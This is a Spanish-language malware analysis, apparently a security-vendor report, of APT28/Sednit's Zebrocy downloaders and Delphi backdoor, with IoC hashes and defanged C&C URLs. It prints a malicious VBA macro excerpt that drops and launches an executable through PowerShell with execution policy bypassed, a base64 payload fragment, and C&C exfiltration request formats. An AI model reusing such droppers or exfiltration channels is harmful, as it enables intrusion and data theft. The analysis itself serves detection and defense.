El grupo Sednit –también conocido como APT28, Fancy Bear, Sofacy o STRONTIUM ─ es un grupo de atacantes que operan desde el 2004, o incluso antes, y cuyo principal objetivo es robar información confidencial de objetivos específicos.
Cerca de finales de 2015 comenzamos a observar un nuevo componente distribuido por el grupo: se trata de un downloader para el principal backdoor de Sednit: Xagent. A principio de 2017 Kaspersky mencionó por primera vez este componente en su reporte de tendencias APT y recientemente escribió un artículo donde brevemente lo describen bajo el nombre Zebrocy.
Este nuevo componente es una familia de malware que comprende downloaders y backdoors escritos en Delphi y AutoIt. Estos componentes tienen el mismo rol tanto en el ecosistema de Sednit como en el de Seduploader; la primera etapa del malware.
Hemos visto que algunas de las víctimas que han sido blanco de Zebrocy se ubican en Azerbaiyán, Bosnia y Herzegovina, Egipto, Georgia, Irán, Kazajistán, Rusia, Arabia Saudita, Serbia, Suiza, Tayikistán, Turquía, Turkmenistán, Ucrania, Uruguay y Zimbabue. Estos objetivos incluyen embajadas, ministerios de asuntos exteriores, y diplomáticos.
La familia Zebrocy está conformada por tres componentes. Según su orden de aparición, estos son: un downloader Delphi, un downloader AutoIt y un backdoor Delphi. La imagen 1 muestra la relación entre cada uno de estos componentes.
En este artículo describiremos esta familia y cómo es que puede coexistir con la antigua herramienta de reconocimiento Seduploader, así como también al final hablaremos de ciertas similitudes y diferencias de Downdelph.
La imagen 1 muestra el malware activo y los métodos de ataque utilizados por Sednit, donde el uso de adjuntos a través del correo es el principal punto de entrada al ecosistema Sednit. Según un artículo recientemente publicado por el equipo de Palo Alto Networks, DealersChoice sigue utilizándose. Ambos, tanto Seduploader como Zebrocy, están siendo distribuidos de manera activa por el grupo Sednit a través de adjuntos en correos. Finalmente, luego de una fase de reconocimiento, Xagent y Xtunnel son desplegados hacia objetivos considerados interesantes por quienes los operan.
Métodos de ataques
El primer componente de un ataque basado en Zebrocy llega como un correo electrónico. Las víctimas son tentadas para abrir el adjunto de un correo que pueden ser un documento de Microsoft Office o un archivo.
Documentos maliciosos
Los documentos maliciosos utilizados por Sednit descargan el payload que se encarga de la primera etapa a través de Visual Basic para aplicaciones (VBA), exploits o incluso utilizando Dynamic Data Exchange (DDE). A fines de 2017, el grupo Sednit lanzó dos campañas en las que enviaba dos tipos de documentos maliciosos. El primero fue llamado Syria - New Russia provocations.doc y el segundo fue llamado Note Letter Mary Christmas Card.doc.
Ambos documentos maliciosos contienen una macro VBA que crea un archivo nombrado de manera aleatoria en %TEMP%. El malware ejecutable es entonces decodificado y escrito en este archivo, el cual es luego ejecutado a través de un comando PowerShell o mediante Scriptable Shell Objects.
[...]
Sub AutoClose()
On Error Resume Next
vAdd = ""
For I = 1 To 8
vAdd = vAdd + Chr(97 + Rnd(20) * 25)
Next
vFileName = Environ("temp") & "\" + vAdd & ".e" + "x" & "e"
SaveNew vFileName, UserForm1.Label1.Caption
Application.Run "XYZ", vFileName, "WScript.Shell"
End Sub
Public Function XYZ(vF, vW)
vStr = "powershell.exe -nop -Exec Bypass -Command Start-Process '" + vF + "';"
Call CreateObject(vW).Run(vStr, 0)
End Function
[...]
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu
[...]
Example of Visual Basic function and base64 encoded first stage from Syria - New Russia provocations.doc document.
Archivos
Algunas campañas utilizaron un archivo para inyectar la primera etapa en la computadora de la víctima, en lugar de hacerlo a través de macros de documentos de Office; y probablemente esos archivos llegaban a destino como adjuntos en un correo.
Toda la primera etapa de la familia Zebrocy está compuesta por ejecutables con un ícono y un nombre de archivo con apariencia de documento que intenta engañar a la víctima, tal como se muestra en la Figura 3.
Downloader Delphi
Un downloader Delphi es la primera etapa de la familia Zebrocy, a pesar de que hemos visto algunas campañas del grupo Sednit en las que en su lugar utilizan el downloader AutoIt directamente. La mayoría de estos downloaders binarios Delphi utilizan íconos de documentos de Office u otros como los de la librería de Windows, y en algunas ocasiones estas muestras se empaquetan con UPX, un compresor de ejecutables gratuito. El propósito en esta primera etapa es recuperar un máximo de información de la computadora de la víctima.
Cuando el malware es lanzado, aparece una ventana emergente con un falso mensaje de error que incluye el nombre del archivo del binario droppeado. Por ejemplo, si el nombre del archivo es srsiymyw.exe, el nombre de archivo que aparece en la ventana emergente será srsiymyw.doc (Ver Figura 4). El propósito del pop up que se abre es distraer al usuario y hacerle creer que no está sucediendo nada extraño en su computadora.
De hecho, el downloader está ocupado creando un archivo en %TEMP% con un nombre de archivo hardcodeado en el binario (a pesar de que en esta etapa el archivo está vacío). La persistencia se implementa al agregar una llave de registro de Windows en HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ con la ruta del nombre del archivo codificado.
Para reunir información, el malware crea un nuevo proceso utilizando la función CreateProcess de la API de Windows con cmd.exe /c SYSTEMINFO & TASKLIST como argumento lpCommandLine. Una vez que la información se recupera, envía el resultado a través de una solicitud HTTP POST al servidor C&C especificado en el binario. Esta acción la repite hasta que recibe la siguiente etapa.
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: xxxx
Host: <ip_address>
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1
pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output>
[...]
Delphi downloader HTTP POST request
Una vez que la solicitud se envió, el servidor C&C responde enviando la próxima etapa, siempre que el blanco infectado sea considerado de interés por el operador. El tiempo que transcurre entre que se envía el reporte y se recibe el payload es de unas pocas horas. Esta siguiente etapa se escribe en el archivo creado anteriormente y se ejecuta.
Downloader AutoIt
El downloader AutoIt es otra capa de la fase de reconocimiento durante la infección de la computadora de la víctima. De aquí en adelante, dos escenarios son posibles: en el primero, la primera etapa es el downloader Delphi y la segunda etapa ─la cual es el downloader AutoIt─ consiste en un downloader más liviano. En el segundo escenario posible, el downloader AutoIt es la primera etapa y tiene todas las funcionalidades del downloader Delphi e incluso más también.
Cuando el downloader AutoIt es la primera de las etapas realiza muchas funciones de reconocimiento. Incluso comparte algunas similitudes con el downloader Delphi, como el mecanismo de persistencia y la ventana emergente, pero agrega más detalle a la fase de reconocimiento que el downloader Delphi. A continuación, compartimos una lista (no exhaustiva) de sus capacidades:
- Detecta sandbox y entornos virtuales
- Obtiene una lista de los programas instalados (via HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall)
- Obtiene la versión de Windows (32-bit o 64-bit)
- Obtiene la lista de procesos
- Obtiene información del disco rígido
- Obtiene capturas de pantalla
- Obtiene variada información de la computadora de la víctima utilizando Windows Management Instrumentation (WMI) Objects, inspirados probablemente por el código de este repositorio de GitHub.
Dependiendo de la etapa previa, el nombre del binario AutoIt es diferente. Si el malware es lanzado como la primera etapa, tiene nombre de documento. De otra manera, se le asigna el nombre codificado con el downloader Delphi, tal como se ve en la Tabla 1.
Table 1: AutoIt binary filenames, depending of the first stage |
#colspan# |
---|---|
First Stage |
AutoIt binary Filenames |
Delphi downloader |
csrsvc.exe |
Email attachment |
Protocol List_20160606.exe |
El propósito de esta etapa es más o menos el mismo que el de la previa. Existen muchas versiones disponibles, pero todas incluyen al menos el código para lograr lo siguiente:
- Recuperar el número de serie del disco rígido C:
- Usar funciones de red de winhttp.dll o winhttp.au3
- Ejecutar el payload recibido desde el servidor C&C
De la misma manera que el downloader Delphi tiene una ventana emergente, el AutoIt también tiene una ventana emergente cuando viene desde el adjunto de un correo ─el AutoIt es la primera etapa. La ventana emergente está relacionada con el programa representado por el ícono del binario. Por ejemplo, un downloader AutoIt con ícono de Adobe Reader despliega una ventana emergente que dice que el archivo PDF que la víctima pretende abrir está corrupto. Un binario AutoIt bajo un ícono de Word desplegará el siguiente popup solicitando la contraseña. Aunque como la contraseña no es considerada en este punto; creemos que se trata simplemente de una manera de distraer a la víctima de la actividad realmente maliciosa del código.
Backdoor Delphi
El backdoor Delphi es la fase final de la cadena de componentes que conforman a Zebrocy. En el pasado hemos visto a Zebrocy descargar el backdoor principal del grupo Sednit, llamado Xagent.
A diferencia de los componentes anteriores, éste tiene un número de versión interno que no parece estar relacionado a una campaña en particular. Este número de versión ha evolucionado con el correr del tiempo, tal como se puede apreciar en la Tabla 2:
Table 2: Delphi backdoor internal version history |
#colspan# |
---|---|
PE timestamp | version |
2015-12-28 | 2.1 |
2016-01-06 | 2.2 |
2016-01-25 | 2.3 |
2016-02-03 | 2.4 |
2016-03-14 | 2.5 |
2016-04-08 | 3.0 |
2016-04-26 | 3.2 |
2016-06-01 | 4.4 |
2016-09-08 | 5.0 |
2016-12-15 | 5.1 |
2017-06-01 | 7.0 |
2017-09-26 | 8.0 |
2017-10-12 | 8.1 |
2017-11-12 | 8.2 |
2017-12-26 | 8.5 |
2018-01-09 | 8.6 |
2017-12-18 | 10.1 |
2018-01-09 | 10.2 |
2018-01-16 | 10.3 |
2018-01-18 | 11.0 |
2018-02-07 | 12.0 |
2018-03-05 | 13.0 |
2018-03-06 | 13.1 |
2018-03-14 | 14.0 |
2018-03-28 | 14.1 |
Es importante aclarar que no contamos con el panorama completo y puede que nos hayamos perdido de algunas versiones del backdoor. Además, existe cierta superposición entre versiones, lo que indica que algunas versiones más antiguas siguen siendo utilizadas al mismo tiempo que las versiones nuevas.
En los próximos párrafos detallaremos algunas de las diferencias que hemos visto en el malware durante su evolución. El backdoor incorpora un bloque de configuración cuyos valores cambian entre las distintas muestras, aunque la lista de ítems configurables se mantiene siempre igual. Sin embargo, la forma en que son almacenados los datos de configuración en la muestra del malware ha ido evolucionando a través del tiempo.
La primera versión del backdoor embebía los datos de la configuración en texto plano, como se puede apreciar en la imagen 6.
Luego, en versiones posteriores, los autores del malware codificaron los datos de configuración en cadenas hexadecimales, como se puede ver en la imagen 7.
En las últimas versiones, los datos de configuración son cifrados dentro de los recursos utilizando el algoritmo AES, mientras que en versiones más antiguas los almacenaba en la sección .text
Los datos de configuración contienen:
- Claves AES para comunicarse con el servidor C&C
- Direcciones (URL) con patrones que difieren de una muestra a la otra
- La versión del malware
- La llave/valor de registro de Windows que asegura la persistencia del backdoor
- La ruta donde se almacenan los archivos temporales (%APPDATA%)
- Los nombres de los directorios ocultos que serán creados para almacenar los archivos temporales: los nombres de los directorios son concatenados con la variable de entorno (%APPDATA%)
Una vez que el malware es configurado, ejecuta llamadas a otras funciones a través de la función SetTimer de la API de Windows. Estas llamadas permiten al operador manipular varias funciones y comandos del backdoor.
- Realiza capturas de pantalla del escritorio de la víctima
- Registra las pulsaciones del teclado
- Crea una lista de los recursos de los discos y las redes
- Lee y escribe en el registro de Windows
- Copia, mueve o borra un objeto del sistema de archivos (file system)
- Ejecuta archivos o crea tareas programadas
El número de comandos que manipula el backdoor ─ cerca de 30 ─ difiere de una versión a la siguiente. Para comunicarse con el servidor C&C, el backdoor almacena el reporte de esas funciones en un archivo temporario. Luego leerá el contenido del archivo temporal y lo enviará. Estos archivos temporales son almacenados en uno de los directorios ocultos creados durante la fase de configuración.
POST (\/[a-zA-Z0-9\-\_\^\.]*){3}\.(php|dat). HTTP/1.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=--------<mmddyyhhnnsszzz>
Content-Length: <N>
Host: <ip_address>
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------<mmddyyhhnnsszzz>
Content-Disposition: form-data; name="userfile"; filename="%APPDATA%\Microsoft\<directories>\<tempfilename>.tmp"
Content-Type: <tempfilename_hex_encoded>.tmp
<tempfilename content>
----------<mmddyyhhnnsszzz>--
Delphi backdoor POST request
El contenido del tempfilename es la salida de cualquier comando ejecutado. El contenido es cifrado utilizando el algoritmo de AES-256-ECB con la primer llave AES de los datos de configuración, luego la salida es codificada de forma hexadecimal. El contenido enviado al servidor C&C varía de un comando a otro, pero todos contienen al menos el número de serie del disco rígido y los primeros cuatro bytes del nombre de la computadora. Por ejemplo, HELLO corresponde al primer paquete enviado por el backdoor para establecer contacto con el servidor C&C. Como se muestra más abajo, contiene la fecha de cuando se lanzó la tarea, el número de la versión interna del backdoor Delphi, el número de serie del HDD, el nombre de la computadora (primeros cuatro bytes), el comando y la fecha de cuando se ejecutó el backdoor.
Start: 1/4/2018 1:37:00 PM - [<vx.x>]:42424242ESET-HELLO-[2018-04-04 01-37-00]-315.TXT.
La segunda llave AES en los datos de configuración es utilizada para descifrar la respuesta del servidor C&C. Al igual que Seduploader, este backdoor es utilizado para desplegar Xagent en la computadora de la víctima, luego de que tras la fase de reconocimiento haya sido considerada una máquina de interés para el operador.
Conclusión
Un componente escrito en Delphi no resulta algo nuevo para el grupo Sednit, ya que anteriormente utilizó este mismo lenguaje para Downdelph. Sin embargo, incluso sin que este último componente tenga algo en común con Downdelph “técnicamente hablando”, hay algunos puntos que vale la pena mencionar.
- Los métodos de implementación son los mismos, ya que ambos se entregan como adjuntos en un correo.
- La última vez que vimos Downdelph fue en septiembre de 2015, y la primera muestra de Zebrocy que vimos activa data de noviembre de 2015.
- Ambos están escritos en Delphi
Podemos plantear la hipótesis de que el grupo Sednit abandonó un componente y comenzó a desarrollar uno nuevo. Sin embargo, una cosa que no cambio para el grupo son los errores que cometieron:
- El nombre de la tarea programada: Windiws
- El nombre de la función que recupera la información del sistema en el downloader AutoIt es _SOFWARE()
- Mary en lugar de Merry en Note Letter Mary Christmas Card.doc
El array de bytes usados por el backdoor Delphi como llaves AES-256 son de una longitud de 38 bytes en lugar de 32. No se trata de un error de deletreo; más bien de falta de atención.
Hemos visto que Zebrocy ha sido muy utilizado por el grupo Sednit a lo largo de los últimos dos años. Nuestro análisis de varias de las nuevas variantes que aparecieron sobre una base regular desde 2017 indican claramente que Zebrocy se mantiene activo y bajo constante mantenimiento por su autor(es). Por lo tanto, podemos considerarlo como una de las herramientas estables y maduras del arsenal del grupo Sednit; una herramienta que merece ser monitoreada de cerca.
IoCs
Malicious documents
SHA-1 | ESET Detection name | Filename |
---|---|---|
4f07d18475601d0492cbf678ee0f0860c729910e | VBA/TrojanDropper.Agent.YC | Note Letter Mary Christmas Card.doc |
f10b2c052afc07e2dec9dbe816031059fdc900ba | VBA/TrojanDropper.Agent.AAK | Syria - New Russia provocations.doc |
Delphi downloader
SHA-1 | ESET Detection name |
---|---|
00b39f2deaf1f1fc29e5acb63f4d1100e04fd701 | Win32/TrojanDownloader.Delf.CFS |
07e44b44c5f1043d16f6011a2cf0d2e7c5a52787 | Win32/TrojanDownloader.Delf.CFG |
0f946f619ae8e2181a5bd76c8af03347742765c6 | Win32/TrojanDownloader.Delf.CGW |
2900ed173a9f5dc99f905942a6be595cc6f03387 | Win32/TrojanDownloader.Delf.CFG |
2b5a7f4e054d0130883c8821b629121e0228bf54 | Win32/TrojanDownloader.Delf.CIP |
36b5e59a01e7f244d4a3bbb539e57aa468115dc8 | Win32/TrojanDownloader.Delf.CGB |
37bd951c483da057337ef8f38d6e48051cbb39d0 | Win32/TrojanDownloader.Delf.CHC |
41686703ce9e9aec64b6ad1c516746751219bc62 | Win32/TrojanDownloader.Delf.CFS |
4e6470f4a245efaa138c8c6eedb046e916706383 | Win32/TrojanDownloader.Delf.CGW |
54b14fc84f152b43c63babc46f2597b053e94627 | Win32/TrojanDownloader.Delf.CGB |
afd5a60b7fff4deea15f7011339ad2cc2987a937 | Win32/TrojanDownloader.Delf.CGW |
d4ab51bc5c26183771e3358d76e348943f9dd2fc | Win32/TrojanDownloader.Delf.CGB |
d6fdc72792ee736b8d606d40d72cb89d6e8a3e18 | Win32/TrojanDownloader.Delf.CFU |
AutoIt downloader
SHA-1 | ESET Detection name |
---|---|
0cd61d367dd0b13000774ab77abf3d4cfb713c8e | Win32/TrojanDownloader.Autoit.ODO |
185ab7a371b58ff367c155ec0dabe28842d340bd | Win32/TrojanDownloader.Autoit.OBG |
267abd7105ac26d5cb6ecb96292f83708f64b994 | Win32/TrojanDownloader.Autoit.OHC |
4a6dcbccab5344388b331d543cc2260ca531c7ca | Win32/Autoit.CT |
62dcf2f33ecc6014fa9a10f4e9ac9fd9bb0a6d23 | Win32/TrojanDownloader.Autoit.OCO |
b8b847d3d0139db68dba730b3424b29dcb40b3c7 | Win32/TrojanDownloader.Autoit.OMA |
c0271dbb02636402742c390ffbeee6418f696668 | Win32/TrojanDownloader.Autoit.OMB |
d379b94a3eb4fd9c9a973f64d436d7fc2e9d6762 | Win32/Spy.Autoit.EI |
dabeadf0a9af3a8a0802f8445670806cd7671b1d | Win32/TrojanDownloader.Autoit.OCI |
Delphi backdoor
SHA-1 | ESET Detection name |
---|---|
0983d940ba42135106bf7a1e87ed5a1975fc7ead | Win32/Delf.BFF |
226083c7190f1a939d5b7b352400450690d59f65 | Win32/Delf.BDW |
245868d6805c66181808973e93f23293d6d2f7d1 | Win32/Delf.BDT |
2c01ae417e5de213845b1ed46d4e82d45edd598d | Win32/Delf.BBP |
4ccbe222bd97dc229b36efaf52520939da9d51c8 | Win32/Delf.BFC |
51ae516792570bcd069a657c27859cd3fdc07d00 | Win32/Delf.BBP |
55179f0c6bce5a37311a44efe3f9845096c09668 | Win32/Delf.AWE |
6fd7ce97061169b835ea77976651b5bf20aca4ef | Win32/TrojanDownloader.Delf.BRV |
7349843e4dac1226ad6ce3e3cda8c389dd599548 | Win32/TrojanDownloader.Delf.BRV |
7b5c223a4968cc2190c1b5444cad47187d27ec50 | Win32/TrojanDownloader.Delf.BRV |
83882e13b369986b513f4aae245c112b82ec2097 | Win32/Delf.BEB |
8aedf7a462024acf72d708c89230e4f02d94bc78 | Win32/Delf.BDT |
8bd56b580974ae195e9f92b3aa525547d33434c1 | Win32/Delf.BEC |
9beacd8e145fa01e16409d44d8b9470af6c7afd8 | Win32/Delf.BBP |
a172fe6e91170f858c8ce5d734c094996bdf83d0 | Win32/Delf.BDT |
ae93b6ec2d56512a1c7e8c053d2a6ce6fdfb7e4c | Win32/Delf.BEX |
c08d89c7f7be69d5d705d4ac7e24e8f48e22faaf | Win32/Delf.BDW |
c2f3ca699aef3d226a800c2262efdca1470e00dc | Win32/Delf.AVP |
cdf9c24b86bc9a872035dcf3f53f380c904ed98b | Win32/Delf.BEH |
f63e29621c8becac47ae6eac7bf9577bd0a37b73 | Win32/Delf.AVT |
fea8752d90d2b4f0fc49ac0d58d62090782d8c5b | Win32/Delf.BFN |
URLs
http://142[.]0.68.2/test-update-16-8852418/temp727612430/checkUpdate89732468.php
http://142[.]0.68.2/test-update-17-8752417/temp827612480/checkUpdate79832467.php
http://185[.]25.50.93/syshelp/kd8812u/protocol.php
http://185[.]25.50.93/tech99-04/litelib1/setwsdv4.php
http://185[.]25.50.93/techicalBS391-two/supptech18i/suppid.php
http://185[.]25.51.114/get-help-software/get-app-c/error-code-lookup.php
http://185[.]25.51.164/srv_upd_dest_two/destBB/en.php
http://185[.]25.51.198/get-data/searchId/get.php
http://185[.]25.51.198/stream-upd-service-two/definition/event.php
http://185[.]77.129.152/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://188[.]241.68.121/update/dB-Release/NewBaseCheck.php
http://194[.]187.249.126/database-update-centre/check-system-version/id=18862.php
http://194[.]187.249.126/security-services-DMHA-group/info-update-version/id77820082.php
http://213[.]103.67.193/ghflYvz/vmwWIdx/realui.php
http://213[.]252.244.219/client-update-info/version-id/version333.php
http://213[.]252.244.219/cumulative-security-update/Summary/details.php
http://213[.]252.245.132/search-release/Search-Version/crmclients.php
http://213[.]252.245.132/setting-the-os-release/Support-OS-release/ApiMap.php
http://220[.]158.216.127/search-sys-update-release/base-sync/db7749sc.php
http://222[.]15.23.121/gft_piyes/ndhfkuryhs09/fdfd_iunb_hhert_ps.php
http://46[.]102.152.127/messageID/get-data/SecurityID.php
http://46[.]183.223.227/services-check-update/security-certificate-11-554/CheckNow864.php
http://80[.]255.6.5/daily-update-certifaicates52735462534234/update-15.dat
http://80[.]255.6.5/LoG-statistic8397420934809/date-update9048353094c/StaticIpUpdateLog23741033.php
http://86[.]105.18.106/apps.update/DetailsID/clientPID-118253.php
http://86[.]105.18.106/data-extract/timermodule/update-client.php
http://86[.]105.18.106/debug-info/pluginId/CLISD1934.php
http://86[.]105.18.106/ram-data/managerId/REM1234.php
http://86[.]105.18.106/versionID/Plugin0899/debug-release01119/debug-19.app
http://86[.]105.18.111/UpdateCertificate33-33725cnm^BB/CheckerNow-saMbA-99-36^11/CheckerSerface^8830-11.php
http://86[.]106.131.177/srvSettings/conf4421i/support.php
http://86[.]106.131.177/SupportA91i/syshelpA774i/viewsupp.php
http://89[.]249.65.166/clientid-and-uniqued-r2/the-differenceU/Events76.php
http://89[.]249.65.166/int-release/check-user/userid.php
http://89[.]249.65.234/guard-service/Servers-ip4/upd-release/mdb4
http://89[.]40.181.126/verification-online/service.911-19/check-verification-88291.php
http://89[.]45.67.153/grenadLibS44-two/fIndToClose12t3/sol41.php
http://89[.]45.67.153/supportfsys/t863321i/func112SerErr.php
http://93[.]113.131.117/KB7735-9927/security-serv/opt.php
http://93[.]113.131.155/Verifica-El-Lanzamiento/Ayuda-Del-Sistema/obtenerId.php
http://93[.]115.38.132/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/EspTkzmH.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/OspRkzmG.php